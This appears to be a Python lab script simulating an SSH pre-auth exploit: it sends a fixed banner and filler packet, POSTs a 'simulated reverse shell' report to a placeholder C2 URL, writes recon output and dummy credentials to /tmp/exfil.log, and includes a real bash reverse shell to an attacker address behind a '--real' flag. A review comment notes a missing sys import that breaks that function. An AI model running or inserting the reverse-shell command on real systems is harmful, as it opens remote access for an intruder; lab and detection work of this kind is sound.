import socket
import time
import os
import requests
# === Lab Setup ===
# Lab endpoints. Only target_ip defaults to something reachable (loopback);
# the attacker and C2 values are placeholders for an isolated lab network.
target_ip = "127.0.0.1"  # change this to your VM or leave as loopback
attacker_ip = "192.168.1.1"  # listener address; read only by the '--real' branch of trigger_reverse_shell()
attacker_port = 4444  # listener port paired with attacker_ip
c2_url = "http://22.22.333.333:8080/report"  # placeholder (333 is not a valid IPv4 octet); the simulated branch POSTs here
# === Fake SSH Exploit ===
def build_ssh_version():
    """Return the SSH identification line this lab client announces.

    The value is the fixed text ``SSH-2.0-ErlangTest_0.1`` followed by CRLF,
    encoded as ASCII bytes.
    """
    banner = "SSH-2.0-ErlangTest_0.1"
    return (banner + "\r\n").encode("ascii")
def build_crafted_packet():
    """Return the fixed 20-byte probe sent after the version string.

    Layout: a 4-byte big-endian length field holding 16, followed by sixteen
    0x41 (``A``) bytes. The content is static filler, not a real SSH message.
    """
    payload = b"A" * 16
    length_prefix = len(payload).to_bytes(4, "big")
    return length_prefix + payload
def trigger_reverse_shell() -> None:
    """Spawn a live reverse shell, or report a simulated one to the C2 URL.

    With ``--real`` on the command line, ``os.system`` runs an interactive
    bash connected back to ``attacker_ip``:``attacker_port``. That branch is a
    real shell, not a simulation, and belongs only in an isolated lab.
    Without the flag, a short text body is POSTed to ``c2_url``; a failed
    POST is printed and swallowed.

    NOTE(review): ``sys`` is referenced here but is not in this file's import
    block, so this function raises NameError on both branches unless ``sys``
    is brought into scope elsewhere.
    """
    if '--real' in sys.argv:
        print(f"[+] Launching real reverse shell to {attacker_ip}:{attacker_port}")
        # Shell string interpolates the two module-level lab values and is
        # executed through the shell by os.system.
        os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
    else:
        try:
            print(f"[+] Sending simulated reverse shell report to C2 at {c2_url}")
            # No timeout is passed, so an unreachable C2 host can block here.
            requests.post(c2_url, data="💥 Simulated reverse shell triggered to attacker machine!")
        except Exception as e:
            # Best-effort reporting: any exception from the request (e.g.
            # connection refused, DNS failure) is printed, never raised.
            print(f"[!] Callback failed: {e}")
def simulate_post_exploitation():
    """Append host-recon command output and dummy credentials to /tmp/exfil.log.

    Three shell commands (``whoami``, ``uname -a``, ``ls -alh /home/``) have
    their output appended to the log via ``os.system``, then two fixed lines
    holding a fake username/password pair are appended directly. The point is
    to leave detectable artefacts on the host; this function itself sends
    nothing off-host.
    """
    print("[+] Simulating post-exploitation behavior...")
    log_path = "/tmp/exfil.log"
    recon_commands = (
        "whoami",  # current user
        "uname -a",  # system info
        "ls -alh /home/",  # directory structure
    )
    for command in recon_commands:
        os.system(f"{command} >> {log_path}")
    # Dummy credentials are appended directly, not through the shell.
    with open(log_path, "a") as f:
        f.write("\n[+] Simulated exfil of dummy credentials...\n")
        f.write("username: admin\npassword: hunter2\n")
    print("[+] Post-exploitation simulation written to /tmp/exfil.log")
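def send_exploit():
    """Run the lab scenario end to end against ``target_ip``:22.

    Opens a TCP connection, sends the fixed version string and the static
    20-byte probe with a short pause between them, then -- whether or not
    the connection succeeded -- calls ``trigger_reverse_shell()`` and
    ``simulate_post_exploitation()``.

    Fix: the socket is now managed by ``with`` so it is closed on the error
    path as well; previously ``close()`` was only reached when every call in
    the ``try`` body succeeded, leaving the descriptor open after a failure.
    """
    print(f"[+] Connecting to target {target_ip}:22...")
    try:
        # Context manager closes the socket on both success and exception.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((target_ip, 22))
            sock.sendall(build_ssh_version())
            print("[+] Sent SSH version string")
            time.sleep(0.5)
            sock.sendall(build_crafted_packet())
            print("[+] Sent crafted SSH pre-auth packet")
            time.sleep(0.5)
    except OSError as e:
        # Everything in the try body is a socket call, so OSError covers the
        # failures that can occur (refused, unreachable, reset, name lookup).
        # They are reported, not raised, so the host-side simulation still runs.
        print(f"[!] Could not connect/send to target: {e}")
    # Simulated shell + post-exploitation
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()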
if __name__ == "__main__":
    # Script entry point: runs the whole lab scenario (see send_exploit()).
    send_exploit()